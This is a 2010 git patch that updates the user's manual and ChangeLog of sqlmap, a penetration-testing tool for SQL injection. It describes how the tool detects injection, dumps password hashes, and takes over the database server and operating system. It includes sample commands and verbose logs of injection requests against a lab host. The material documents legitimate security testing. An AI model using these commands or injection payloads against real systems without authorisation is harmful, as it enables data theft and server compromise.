From 054a4aaee7122daf38f2f5cf001c448787dac60a Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 12 Mar 2010 17:43:38 +0000 Subject: [PATCH] Updated documentation, almost ready for 0.8 release! --- doc/ChangeLog | 6 +- doc/README.html | 3105 ++++++----- doc/README.pdf | 13962 +++++++++++++++++++++++++--------------------- doc/README.sgml | 814 +-- 4 files changed, 9749 insertions(+), 8138 deletions(-) diff --git a/doc/ChangeLog b/doc/ChangeLog index 686eda39e..248aa533e 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -40,6 +40,8 @@ sqlmap (0.8-1) stable; urgency=low --drop-set-cookie (Miroslav). * Added support to specify which Google dork result page to parse, --gpage to be used together with -g (Miroslav). + * Major bug fix and enhancements to the multi-threading (--threads) + functionality (Miroslav). * Fixed URL encoding/decoding of GET/POST parameters and Cookie header (Miroslav). * Refactored --update to use python-svn third party library if available @@ -55,7 +57,9 @@ sqlmap (0.8-1) stable; urgency=low shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware (Miroslav). * Updated user's manual (Bernardo and Miroslav). - * Created several demo videos, http://sqlmap.sf.net/demo.html (Bernardo). + * Created several demo videos, hosted on YouTube + (http://www.youtube.com/user/inquisb) and linked from + http://sqlmap.sourceforge.net/demo.html (Bernardo). -- Bernardo Damele A. G. Sun, 14 Mar 2010 10:00:00 +0000 diff --git a/doc/README.html b/doc/README.html index 53f78e9a2..2a0b33521 100644 --- a/doc/README.html +++ b/doc/README.html @@ -1,14 +1,15 @@ - + sqlmap user's manual

sqlmap user's manual

by -Bernardo Damele A. G.

version 0.7, July 25, 2009 +Bernardo Damele A. G., +Miroslav Stamparversion 0.8, March 14, 2010
This document is the user's manual to use sqlmap. @@ -23,13 +24,14 @@ for the latest version.
  • 1.1 Requirements
  • 1.2 Scenario
  • 1.3 Techniques +
  • 1.4 Demo

    2. Features

    @@ -49,34 +51,29 @@ for the latest version.

  • 5.5 Techniques
  • 5.6 Fingerprint
  • 5.7 Enumeration -
  • 5.8 File system access -
  • 5.9 Operating system access -
  • 5.10 Miscellaneous +
  • 5.8 User-defined function injection +
  • 5.9 File system access +
  • 5.10 Operating system access +
  • 5.11 Windows registry access +
  • 5.12 Miscellaneous

    6. Disclaimer

    -

    7. Author

    +

    7. Authors


    1. Introduction

    -

    sqlmap is an open source command-line automatic -SQL injection -tool. -Its goal is to detect and take advantage of SQL injection vulnerabilities -in web applications. Once it detects one or more SQL injections on the -target host, the user can choose among a variety of options to perform an -extensive back-end database management system fingerprint, retrieve DBMS -session user and database, enumerate users, password hashes, privileges, -databases, dump entire or user's specified DBMS tables/columns, run his own -SQL statement, read or write either text or binary files on the file -system, execute arbitrary commands on the operating system, establish an -out-of-band stateful connection between the attacker box and the database -server via Metasploit payload stager, database stored procedure buffer -overflow exploitation or SMB relay attack and more.

    +

    sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over of +back-end database servers. +It comes with a broad range of features lasting from database +fingerprinting, over data fetching from the database, to accessing the +underlying file system and executing commands on the operating system via +out-of-band connections.

    1.1 Requirements @@ -85,30 +82,36 @@ overflow exploitation or SMB relay attack and more.

    sqlmap is developed in Python, a dynamic object-oriented interpreted programming language. -This makes the tool independent from the operating system since it only +This makes the tool independent from the operating system. It only requires the Python interpreter version equal or above to 2.5. The interpreter is freely downloadable from its official site. To make it even easier, many GNU/Linux distributions come out of the box -with Python interpreter package installed and other Unices and MacOS X -too provide it packaged in their formats and ready to be installed. +with Python interpreter installed and other Unices and Mac OSX too provide +it packaged in their formats and ready to be installed. Windows users can download and install the Python setup-ready installer for x86, AMD64 and Itanium too.

    sqlmap relies on the Metasploit Framework for some of its post-exploitation takeover -functionalities. You need to grab a copy of it from the +features. You need to grab a copy of it from the download -page. The required version is 3.3 or above.

    +page. The required version is 3.3.3 or above. However, it is +recommended to use the Metasploit latest development version from the +Subversion repository.

    +

    If you plan to attack a web application behind NTLM authentication or use +the sqlmap update functionality you need to install respectively +python-ntlm +and +python-svn libraries.

    Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and history support functionalities in the SQL shell and OS shell. Note that these functionalities are available natively by Python standard readline -library on other operating systems. -You can also choose to install -Psyco -library to speed up the sqlmap algorithmic operations.

    +library on other operating systems.

    +

    You can also choose to install +Psyco library to speed up the sqlmap algorithmic operations.

    1.2 Scenario @@ -125,19 +128,19 @@ or even be able to access the underlying operating system.

    Consider that the target url is:

    -http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 +http://172.16.213.131/sqlmap/mysql/get_int.php?id=1

    Assume that:

    -http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1 +http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=1

    is the same page as the original one and:

    -http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2 +http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=2

    differs from the original one, it means that you are in front of a SQL @@ -150,10 +153,10 @@ does not depend upon the back-end database management system nor on the web application programming language: it is a programmer code's security flaw. The Open Web Application Security Project -rated on 2007 in their -OWASP Top Ten survey this vulnerability as the -most common and important web application vulnerability, second only to -Cross-Site Scripting.

    +rated on 2010 in their +OWASP Top Ten survey this vulnerability as the +most common and important web application vulnerability along with other +injection flaws.

    Back to the scenario, probably the SQL SELECT statement into get_int.php has a syntax similar to the following SQL query, in pseudo PHP code:

    @@ -182,14 +185,13 @@ on the Net explaining in depth how to prevent, how to detect and how to exploit SQL injection vulnerabilities in web application and it is recommended to read them if you are not familiar with the issue before going ahead with sqlmap.

    -

    Passing the original address, http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 +

    Passing the original address, http://172.16.213.131/sqlmap/mysql/get_int.php?id=1 to sqlmap, the tool will automatically:

    • Identify the vulnerable parameter(s) (id in this scenario);
    • -
    • Depending on the user's options, sqlmap uses the blind SQL -injection or the inband SQL injection technique as described -in the following section to go ahead with the exploiting.
    • +
    • Depending on the user's options, fingerprint, enumerate, takeover +the database server.

    @@ -241,10 +243,18 @@ and the session user privileges.

  • +

    1.4 Demo +

    + +

    You can watch several demo videos, they are hosted on +YouTube and linked +from +here.

    +

    2. Features

    -

    Major features implemented in sqlmap include:

    +

    Features implemented in sqlmap include:

    2.1 Generic features @@ -254,7 +264,7 @@ and the session user privileges.
    • Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. -Besides these four database management systems software. sqlmap can also +Besides these four database management systems software, sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
    • Full support for three SQL injection techniques: inferential @@ -265,12 +275,14 @@ blind SQL injection.
    • It is possible to provide a single target URL, get the list of targets from Burp proxy -requests log file path or +requests log file or WebScarab proxy -conversations/ folder path or get the list of targets by providing -sqlmap with a Google dork which queries +conversations/ folder, get the whole HTTP request from a text +file or get the list of targets by providing sqlmap with a Google dork +which queries Google search engine and -parses its results page. +parses its results page. You can also define a regular-expression based +scope that is used to identify which of the parsed addresses to test.
    • Automatically tests all provided GET parameters, POST parameters, HTTP Cookie header values and HTTP @@ -279,29 +291,32 @@ those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted -string and all of these three datatypes with zero to two parenthesis +string and all of these three data-types with zero to two parenthesis to correctly detect which is the SELECT statement syntax to -perform further injections with. It is also possible to specify the +perform further injections with. It is also possible to specify the only parameter(s) that you want to perform tests and use for injection on.
    • Option to specify the maximum number of concurrent HTTP -requests to speed up the blind SQL injection algorithms -(multithreading). It is also possible to specify the number of seconds to +requests to speed up the inferential blind SQL injection algorithms +(multi-threading). It is also possible to specify the number of seconds to wait between each HTTP request.
    • HTTP Cookie header string support, useful when the web application requires authentication based upon cookies and you have such data or in case you just want to test for and exploit SQL injection -on such header. +on such header. You can also specify to always URL-encode the Cookie +header.
    • Automatically handle HTTP Set-Cookie header from -target url, re-establishing of the session if it expires. Test and exploit -on these values is supported too. +the application, re-establishing of the session if it expires. Test and +exploit on these values is supported too. You can also force to ignore any +Set-Cookie header.
    • -
    • HTTP Basic and Digest authentications support. +
    • HTTP Basic, Digest, NTLM and Certificate authentications +support.
    • Anonymous HTTP proxy support to pass by the requests to the -target URL that works also with HTTPS requests. +target application that works also with HTTPS requests.
    • Options to fake the HTTP Referer header value and the HTTP User-Agent header value specified by user or @@ -309,7 +324,7 @@ randomly selected from a text file.
    • Support to increase the verbosity level of output messages: there exist six levels. The default level is 1 in which -information, warnings, errors and tracebacks, if they occur, will be shown. +information, warnings, errors and tracebacks (if any occur) will be shown.
    • Granularity in the user's options.
    • @@ -317,90 +332,141 @@ information, warnings, errors and tracebacks, if they occur, will be shown. in real time while fetching the information to give to the user an overview on how long it will take to retrieve the output. -
    • Support to save the session (queries and their output, even if -partially retrieved) in real time while fetching the data on a text file -and resume the injection from this file in a second time. +
    • Automatic support to save the session (queries and their output, +even if partially retrieved) in real time while fetching the data on a +text file and resume the injection from this file in a second +time.
    • Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
    • -
    • Integration with other IT security related open source projects, -Metasploit and -w3af. +
    • Option to update sqlmap as a whole to the latest development version +from the Subversion repository.
    • -
    • PHP setting magic_quotes_gpc bypass by encoding -every query string, between single quotes, with CHAR, or similar, -database management system function.
    • +
    • Integration with other IT security open source projects, +Metasploit and +w3af.

    -

    2.2 Enumeration features +

    2.2 Fingerprint and enumeration features

    +

    2.3 Takeover features

    +

    Some of these techniques are detailed in the white paper +Advanced SQL injection to operating system full control and in the +slide deck +Expanding the control over the operating system from the database.

    +

    3. Download and update

    sqlmap can be downloaded from its @@ -409,31 +475,31 @@ It is available in various formats:

    -

    You can also checkout the source code from the sqlmap +

    You can also checkout the latest development version from the sqlmap Subversion -repository to give a try to the development release:

    +repository:

    @@ -442,16 +508,57 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
     

    +

    If you download a source package (gzip, bzip2 or zip) or sqlmap from the +Subversion repository, you can update it to the latest development version +anytime by running:

    +

    +

    +
    +$ python sqlmap.py --update
    +
    +
    +

    +

    Or:

    +

    +

    +
    +$ svn update
    +
    +
    +

    + +

    Viceversa if you download a binary package (deb, rpm or exe), the +update feature is disabled.

    + +

    There are some differences between the packages:

    +

    +

      +
    • The source packages (gzip, bzip2 and zip) have all features. They +contains the working copy from the Subversion repository updated at the +time the sqlmap new version has been released.
    • +
    • The Debian and Red Hat installation packages (deb and rpm) are +compliant with the Linux distributions' packaging guidelines. This implies +that they do not support the update features and do not include +third-party softwares Churrasco (used to perform Windows token kidnapping, +see below) and UPX (used to pack the Metasploit payload stager in some +cases, see below).
    • +
    • The Windows binary package (exe) can't update itself and does not +support the takeover out-of-band features because they rely on +Metasploit's msfcli which is not available for Windows.
    • +
    +

    + +

    It is therefore recommended to download any of the source packages and run +it either from a shell like Bash on Unix and Mac OSX or from Cygwin on +Windows.

    +

    4. License and copyright

    sqlmap is released under the terms of the General Public License v2. sqlmap is copyrighted by -Bernardo Damele A. G. -(2007-2009) and -Daniele Bellucci -(2006).

    +Bernardo Damele A. G..

    5. Usage

    @@ -461,8 +568,8 @@ sqlmap is copyrighted by
     $ python sqlmap.py -h
     
    -    sqlmap/0.7
    -    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    +    sqlmap/0.8 - automatic SQL injection and database takeover tool
    +    http://sqlmap.sourceforge.net
         
     Usage: sqlmap.py [options]
     
    @@ -476,7 +583,8 @@ Options:
         get target urls from.
     
         -u URL, --url=URL   Target url
    -    -l LIST             Parse targets from Burp or WebScarab logs
    +    -l LIST             Parse targets from Burp or WebScarab proxy logs
    +    -r REQUESTFILE      Load HTTP request from a file
         -g GOOGLEDORK       Process Google dork results as target urls
         -c CONFIGFILE       Load options from a configuration INI file
     
    @@ -486,17 +594,22 @@ Options:
         --method=METHOD     HTTP method, GET or POST (default GET)
         --data=DATA         Data string to be sent through POST
         --cookie=COOKIE     HTTP Cookie header
    -    --referer=REFERER   HTTP Referer header
    +    --cookie-urlencode  URL Encode generated cookie injections
    +    --drop-set-cookie   Ignore Set-Cookie header from response
         --user-agent=AGENT  HTTP User-Agent header
         -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
    +    --referer=REFERER   HTTP Referer header
         --headers=HEADERS   Extra HTTP headers newline separated
    -    --auth-type=ATYPE   HTTP Authentication type (value Basic or Digest)
    -    --auth-cred=ACRED   HTTP Authentication credentials (value name:password)
    +    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
    +    --auth-cred=ACRED   HTTP authentication credentials (name:password)
    +    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
         --proxy=PROXY       Use a HTTP proxy to connect to the target url
    +    --ignore-proxy      Ignore system default HTTP proxy
         --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
         --delay=DELAY       Delay in seconds between each HTTP request
         --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
         --retries=RETRIES   Retries when the connection timeouts (default 3)
    +    --scope=SCOPE       Regexp to filter targets from provided proxy log
     
       Injection:
         These options can be used to specify which parameters to test for,
    @@ -539,12 +652,12 @@ Options:
         --current-db        Retrieve DBMS current database
         --is-dba            Detect if the DBMS current user is DBA
         --users             Enumerate DBMS users
    -    --passwords         Enumerate DBMS users password hashes (opt -U)
    -    --privileges        Enumerate DBMS users privileges (opt -U)
    +    --passwords         Enumerate DBMS users password hashes
    +    --privileges        Enumerate DBMS users privileges
         --dbs               Enumerate DBMS databases
    -    --tables            Enumerate DBMS database tables (opt -D)
    -    --columns           Enumerate DBMS database table columns (req -T opt -D)
    -    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
    +    --tables            Enumerate DBMS database tables
    +    --columns           Enumerate DBMS database table columns
    +    --dump              Dump DBMS database table entries
         --dump-all          Dump all DBMS databases tables entries
         -D DB               DBMS database to enumerate
         -T TBL              DBMS database table to enumerate
    @@ -553,9 +666,17 @@ Options:
         --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
         --start=LIMITSTART  First query output entry to retrieve
         --stop=LIMITSTOP    Last query output entry to retrieve
    +    --first=FIRSTCHAR   First query output word character to retrieve
    +    --last=LASTCHAR     Last query output word character to retrieve
         --sql-query=QUERY   SQL statement to be executed
         --sql-shell         Prompt for an interactive SQL shell
     
    +  User-defined function injection:
    +    These options can be used to create custom user-defined functions.
    +
    +    --udf-inject        Inject custom user-defined functions
    +    --shared-lib=SHLIB  Local path of the shared library
    +
       File system access:
         These options can be used to access the back-end database management
         system underlying file system.
    @@ -565,7 +686,7 @@ Options:
         --dest-file=DFILE   Back-end DBMS absolute filepath to write to
     
       Operating system access:
    -    This option can be used to access the back-end database management
    +    These options can be used to access the back-end database management
         system underlying operating system.
     
         --os-cmd=OSCMD      Execute an operating system command
    @@ -577,10 +698,24 @@ Options:
         --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
         --tmp-path=TMPPATH  Remote absolute path of temporary files directory
     
    +  Windows registry access:
    +    These options can be used to access the back-end database management
    +    system Windows registry.
    +
    +    --reg-read          Read a Windows registry key value
    +    --reg-add           Write a Windows registry key value data
    +    --reg-del           Delete a Windows registry key value
    +    --reg-key=REGKEY    Windows registry key
    +    --reg-value=REGVAL  Windows registry key value
    +    --reg-data=REGDATA  Windows registry key value data
    +    --reg-type=REGTYPE  Windows registry key value type
    +
       Miscellaneous:
    -    --eta               Display for each output the estimated time of arrival
    -    --update            Update sqlmap to the latest stable version
         -s SESSIONFILE      Save and resume all data retrieved on a session file
    +    --flush-session     Flush session file for current target
    +    --eta               Display for each output the estimated time of arrival
    +    --gpage=GOOGLEPAGE  Use google dork results from specified page number
    +    --update            Update sqlmap
         --save              Save options on a configuration INI file
         --batch             Never ask for user input, use the default behaviour
         --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
    @@ -596,45 +731,38 @@ Options:
     
     

    Verbose options can be used to set the verbosity level of output messages. There exist six levels. -The default level is 1 in which information, warnings, errors and -tracebacks, if they occur, will be shown. +The default level is 1 in which +information, warnings, errors and tracebacks (if any occur) will be shown. Level 2 shows also debug messages, level 3 shows also -HTTP requests with all HTTP headers sent, level 4 shows also HTTP -responses headers and level 5 shows also HTTP responses page -content.

    +full HTTP requests, level 4 shows also HTTP responses headers and +level 5 shows also HTTP responses page content.

    Example on a MySQL 5.0.67 target (verbosity level 1):

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
    +
    +[hh:mm:58] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
    +[hh:mm:58] [INFO] testing connection to the target url
    +[hh:mm:58] [INFO] testing if the url is stable, wait a few seconds
    +[hh:mm:59] [INFO] url is stable
    +[hh:mm:59] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
    +[hh:mm:59] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
    +[hh:mm:59] [INFO] testing if GET parameter 'id' is dynamic
    +[hh:mm:59] [INFO] confirming that GET parameter 'id' is dynamic
    +[hh:mm:59] [INFO] GET parameter 'id' is dynamic
    +[hh:mm:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
    +[hh:mm:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
    +[hh:mm:59] [INFO] confirming unescaped numeric injection on GET parameter 'id'
    +[hh:mm:59] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
    +[hh:mm:59] [INFO] testing for parenthesis on injectable parameter
    +[hh:mm:59] [INFO] the injectable parameter requires 0 parenthesis
    +[hh:mm:59] [INFO] testing MySQL
    +[hh:mm:59] [INFO] confirming MySQL
    +[hh:mm:59] [INFO] retrieved: 0
    +[hh:mm:59] [INFO] the back-end DBMS is MySQL
     
    -[hh:mm:12] [INFO] testing connection to the target url
    -[hh:mm:12] [INFO] testing if the url is stable, wait a few seconds
    -[hh:mm:14] [INFO] url is stable
    -[hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
    -[hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
    -[hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic
    -[hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic
    -[hh:mm:14] [INFO] GET parameter 'id' is dynamic
    -[hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
    -[hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'
    -[hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
    -[hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
    -[hh:mm:14] [INFO] testing for parenthesis on injectable parameter
    -[hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis
    -[hh:mm:14] [INFO] testing MySQL
    -[hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))
    -[hh:mm:14] [INFO] retrieved: 55
    -[hh:mm:14] [INFO] performed 20 queries in 0 seconds
    -[hh:mm:14] [INFO] confirming MySQL
    -[hh:mm:14] [INFO] query: LENGTH(CHAR(53))
    -[hh:mm:14] [INFO] retrieved: 1
    -[hh:mm:14] [INFO] performed 13 queries in 0 seconds
    -[hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
    -[hh:mm:14] [INFO] retrieved: 5
    -[hh:mm:14] [INFO] performed 13 queries in 0 seconds
    -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS: MySQL >= 5.0.0
     
    @@ -645,27 +773,40 @@ back-end DBMS: MySQL >= 5.0.0

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 2
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2
     
    -[hh:mm:03] [DEBUG] initializing the configuration
    -[hh:mm:03] [DEBUG] initializing the knowledge base
    -[hh:mm:03] [DEBUG] cleaning up configuration parameters
    -[hh:mm:03] [DEBUG] setting the HTTP method to GET
    -[hh:mm:03] [DEBUG] creating HTTP requests opener object
    -[hh:mm:03] [DEBUG] parsing XML queries file
    -[hh:mm:03] [INFO] testing connection to the target url
    -[hh:mm:03] [INFO] testing if the url is stable, wait a few seconds
    -[hh:mm:04] [INFO] url is stable
    -[hh:mm:04] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
    -[hh:mm:04] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
    -[hh:mm:04] [INFO] testing if GET parameter 'id' is dynamic
    -[hh:mm:04] [INFO] confirming that GET parameter 'id' is dynamic
    -[hh:mm:04] [INFO] GET parameter 'id' is dynamic
    -[hh:mm:04] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
    -[hh:mm:04] [INFO] testing unescaped numeric injection on GET parameter 'id'
    -[hh:mm:04] [INFO] confirming unescaped numeric injection on GET parameter 'id'
    -[hh:mm:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
    -[...]
    +[hh:mm:22] [DEBUG] initializing the configuration
    +[hh:mm:22] [DEBUG] initializing the knowledge base
    +[hh:mm:22] [DEBUG] cleaning up configuration parameters
    +[hh:mm:22] [DEBUG] setting the HTTP timeout
    +[hh:mm:22] [DEBUG] setting the HTTP method to GET
    +[hh:mm:22] [DEBUG] creating HTTP requests opener object
    +[hh:mm:22] [DEBUG] parsing XML queries file
    +[hh:mm:22] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
    +[hh:mm:22] [INFO] testing connection to the target url
    +[hh:mm:22] [INFO] testing if the url is stable, wait a few seconds
    +[hh:mm:23] [INFO] url is stable
    +[hh:mm:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
    +[hh:mm:23] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
    +[hh:mm:23] [INFO] testing if GET parameter 'id' is dynamic
    +[hh:mm:23] [DEBUG] setting match ratio to 0.743
    +[hh:mm:23] [INFO] confirming that GET parameter 'id' is dynamic
    +[hh:mm:23] [INFO] GET parameter 'id' is dynamic
    +[hh:mm:23] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
    +[hh:mm:23] [INFO] testing unescaped numeric injection on GET parameter 'id'
    +[hh:mm:23] [INFO] confirming unescaped numeric injection on GET parameter 'id'
    +[hh:mm:23] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
    +[hh:mm:23] [INFO] testing for parenthesis on injectable parameter
    +[hh:mm:23] [INFO] the injectable parameter requires 0 parenthesis
    +[hh:mm:23] [INFO] testing MySQL
    +[hh:mm:23] [INFO] confirming MySQL
    +[hh:mm:23] [DEBUG] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
    +[hh:mm:23] [INFO] retrieved: 2
    +[hh:mm:23] [DEBUG] performed 7 queries in 0 seconds
    +[hh:mm:23] [INFO] the back-end DBMS is MySQL
    +
    +web application technology: PHP 5.2.6, Apache 2.2.9
    +back-end DBMS: MySQL >= 5.0.0
     

    @@ -674,31 +815,34 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 2

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 3
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 3
     
    -[...]
    -[hh:mm:54] [INFO] testing connection to the target url
    -[hh:mm:54] [TRAFFIC OUT] HTTP request:
    +[hh:mm:53] [DEBUG] initializing the configuration
    +[hh:mm:53] [DEBUG] initializing the knowledge base
    +[hh:mm:53] [DEBUG] cleaning up configuration parameters
    +[hh:mm:53] [DEBUG] setting the HTTP timeout
    +[hh:mm:53] [DEBUG] setting the HTTP method to GET
    +[hh:mm:53] [DEBUG] creating HTTP requests opener object
    +[hh:mm:53] [DEBUG] parsing XML queries file
    +[hh:mm:53] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
    +[hh:mm:53] [INFO] testing connection to the target url
    +[hh:mm:53] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    +User-agent: sqlmap/0.8
     Connection: close
     [...]
    -[hh:mm:55] [INFO] testing MySQL
    -[hh:mm:55] [INFO] query: CONCAT(CHAR(54), CHAR(54))
    -[hh:mm:55] [TRAFFIC OUT] HTTP request:
    -GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2854%29%2C%20CHAR
    -%2854%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201104=1104 HTTP/1.1
    +[hh:mm:54] [INFO] testing MySQL
    +[hh:mm:54] [TRAFFIC OUT] HTTP request:
    +GET /sqlmap/mysql/get_int.php?id=1%20AND%20CONNECTION_ID%28%29=CONNECTION_ID%28%29%20AND%202385=2385 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    +User-agent: sqlmap/0.8
     Connection: close
     [...]
     
    @@ -709,41 +853,36 @@ Connection: close

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 4
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 4
     
     [...]
    -[hh:mm:44] [INFO] testing connection to the target url
    -[hh:mm:44] [TRAFFIC OUT] HTTP request:
    +[hh:mm:20] [DEBUG] initializing the configuration
    +[hh:mm:20] [DEBUG] initializing the knowledge base
    +[hh:mm:20] [DEBUG] cleaning up configuration parameters
    +[hh:mm:20] [DEBUG] setting the HTTP timeout
    +[hh:mm:20] [DEBUG] setting the HTTP method to GET
    +[hh:mm:20] [DEBUG] creating HTTP requests opener object
    +[hh:mm:20] [DEBUG] parsing XML queries file
    +[hh:mm:20] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
    +[hh:mm:20] [INFO] testing connection to the target url
    +[hh:mm:20] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    +User-agent: sqlmap/0.8
     Connection: close
     
    -[hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200):
    -Date: Thu, 11 Dec 2008 hh:mm:44 GMT
    -Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
    -X-Powered-By: PHP/5.2.6-2ubuntu4
    -Content-Length: 119
    +[hh:mm:20] [TRAFFIC IN] HTTP response (OK - 200):
    +Date: Sat, 20 Feb 2010 17:43:00 GMT
    +Server: Apache/2.2.9
    +X-Powered-By: PHP/5.2.6-1+lenny4
    +Vary: Accept-Encoding
    +Content-Length: 127
     Connection: close
     Content-Type: text/html
     [...]
    -[hh:mm:45] [INFO] testing MySQL
    -[hh:mm:46] [INFO] query: CONCAT(CHAR(52), CHAR(52))
    -[hh:mm:46] [TRAFFIC OUT] HTTP request:
    -GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20CHAR
    -%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%203030=3030 HTTP/1.1
    -Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    -Accept-language: en-us,en;q=0.5
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    -Connection: close
    -[...]
     

    @@ -752,26 +891,33 @@ Connection: close

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5
     
    -[...]
    -[hh:mm:17] [INFO] testing connection to the target url
    -[hh:mm:17] [TRAFFIC OUT] HTTP request:
    +[hh:mm:47] [DEBUG] initializing the configuration
    +[hh:mm:47] [DEBUG] initializing the knowledge base
    +[hh:mm:47] [DEBUG] cleaning up configuration parameters
    +[hh:mm:47] [DEBUG] setting the HTTP timeout
